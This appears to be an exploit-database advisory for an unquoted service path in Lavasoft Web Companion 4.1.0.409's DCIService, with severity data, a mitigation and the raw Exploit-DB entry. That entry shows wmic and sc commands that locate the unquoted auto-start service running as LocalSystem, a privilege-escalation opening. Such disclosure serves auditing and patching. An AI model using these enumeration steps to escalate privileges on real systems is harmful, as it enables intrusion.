Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path

vendor:

Web Companion

by:

P4p4 M4n3

5.5

CVSS

MEDIUM

Unquoted Service Path

428

CWE

Product Name: Web Companion

Affected Version From: 4.1.0.409

Affected Version To: 4.1.0.409

Patch Exists: NO

Related CWE:

CPE: a:lavasoft:web_companion:4.1.0.409

Metasploit:

Other Scripts:

Platforms Tested: Microsoft Windows Server 2019 Datacenter x64

2022

Lavasoft web companion 4.1.0.409 – ‘DCIservice’ Unquoted Service Path

Lavasoft 4.1.0.409 installs DCIservice as a service with an unquoted service path. This vulnerability allows an attacker to escalate privileges and potentially execute arbitrary code.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of Lavasoft web companion or uninstall the software if not required.

Source

Exploit-DB raw data:

#Exploit Title: Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path
# Author: P4p4 M4n3
# Discovery Date: 25-11-2022
# Vendor Homepage: https://webcompanion.com/en/
# Version 4.1.0.409
# Tested on:  Microsoft Windows Server 2019 Datacenter x64

# Description:
# Lavasoft 4.1.0.409 install DCIservice  as a service with an unquoted service path
# POC https://youtu.be/yb8AavCMbes 

#Discover the Unquoted Service path

C:\Users\p4p4\> wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

DCIService        C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe    Auto  


C:\Users\p4p4> sc qc DCIService
[SC] QueryServiceConfig réussite(s)

SERVICE_NAME: DCIService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DCIService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem